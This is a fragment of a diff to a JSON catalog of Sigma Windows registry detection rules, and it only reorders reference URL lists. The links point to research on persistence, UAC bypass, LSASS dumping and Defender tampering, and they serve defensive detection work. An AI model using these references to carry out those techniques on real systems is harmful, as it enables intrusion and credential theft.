"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" ], "tags": [ @@ -18646,8 +18646,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", + "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" ], "tags": [ @@ -18713,9 +18713,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", "https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials", "https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html", - "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" ], "tags": [ @@ -18856,8 +18856,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/gtworek/PSBits/tree/master/SIP", "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", + "https://github.com/gtworek/PSBits/tree/master/SIP", "https://persistence-info.github.io/Data/codesigning.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" ], @@ -18894,8 +18894,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" ], "tags": [ @@ -19028,8 +19028,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "Internal Research", "https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trusted_location_uncommon.yml" ], "tags": [ @@ -19208,8 +19208,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", "https://twitter.com/WhichbufferArda/status/1543900539280293889", + "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" ], "tags": [ @@ -19452,8 +19452,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml" ], "tags": [ @@ -19705,8 +19705,8 @@ "refs": [ "https://persistence-info.github.io/Data/userinitmprlogonscript.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" ], "tags": [ @@ -19846,16 +19846,16 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", - "https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "https://blog.sekoia.io/darkgate-internals/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", "https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry", + "https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://blog.sekoia.io/darkgate-internals/", + "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", "https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" ], "tags": [ @@ -19924,8 +19924,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" ], "tags": [ @@ -19960,8 +19960,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" ], "tags": [ @@ -20213,8 +20213,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf", + "https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise", "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml" ], @@ -20238,8 +20238,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" ], "tags": [ @@ -20296,8 +20296,8 @@ "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", - "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", + "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" ], "tags": [ @@ -20332,8 +20332,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" ], "tags": [ @@ -20366,9 +20366,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection", "https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html", "https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html", - "https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection", "https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml" ], @@ -20484,9 +20484,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password", "https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", - "https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml" ], "tags": [ @@ -20585,10 +20585,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://twitter.com/M_haggis/status/1699056847154725107", "https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content", "https://twitter.com/JAMESWT_MHT/status/1699042827261391247", + "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml" ], "tags": [ @@ -20741,13 +20741,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", - "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", - "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" ], "tags": [ @@ -20914,8 +20914,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" ], "tags": [ @@ -20950,8 +20950,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml" ], "tags": [ @@ -21002,8 +21002,8 @@ "logsource.product": "windows", "refs": [ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", - "https://twitter.com/inversecos/status/1494174785621819397", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml" ], "tags": [ @@ -21094,8 +21094,8 @@ "logsource.product": "windows", "refs": [ "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf", + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml" ], "tags": [ @@ -21328,8 +21328,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/naturallanguage6.html", "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", + "https://persistence-info.github.io/Data/naturallanguage6.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml" ], "tags": [ @@ -21423,8 +21423,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" ], "tags": [ @@ -21457,8 +21457,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", "https://persistence-info.github.io/Data/mpnotify.html", + "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml" ], "tags": [ @@ -21483,8 +21483,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" ], "tags": [ @@ -21609,8 +21609,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" ], "tags": [ @@ -21643,8 +21643,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md", + "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml" ], "tags": [ @@ -21710,9 +21710,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" ], "tags": [ @@ -21745,9 +21745,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" ], "tags": [ @@ -21788,9 +21788,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview", "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml" ], @@ -21824,12 +21824,12 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/", "https://www.attackiq.com/2023/09/20/emulating-rhysida/", + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI", + "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/", "https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html", "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper", "https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior", - "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_desktop_background_change.yml" ], "tags": [ @@ -21905,8 +21905,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml" ], @@ -21941,8 +21941,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" ], "tags": [ @@ -22041,8 +22041,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling", "https://twitter.com/jamieantisocial/status/1304520651248668673", + "https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling", "https://www.sans.org/cyber-security-summit/archives", "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" @@ -22339,8 +22339,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll", "https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/", + "https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml" ], "tags": [ @@ -22407,8 +22407,8 @@ "logsource.product": "windows", "refs": [ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", - "https://twitter.com/inversecos/status/1494174785621819397", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml" ], "tags": [ @@ -22465,8 +22465,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" ], "tags": [ @@ -22603,8 +22603,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" ], "tags": [ @@ -22637,8 +22637,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/998627081360695297", "https://twitter.com/VakninHai/status/1517027824984547329", + "https://twitter.com/pabraeken/status/998627081360695297", "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" ], @@ -22739,8 +22739,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", "https://persistence-info.github.io/Data/autodialdll.html", + "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" ], "tags": [ @@ -22797,8 +22797,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://youtu.be/zSihR3lTf7g", "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", + "https://youtu.be/zSihR3lTf7g", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" ], "tags": [ @@ -22834,8 +22834,8 @@ "refs": [ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" ], "tags": [ @@ -22901,8 +22901,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", "https://unit42.paloaltonetworks.com/ransomware-families/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" ], @@ -22934,8 +22934,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" ], "tags": [ @@ -22976,9 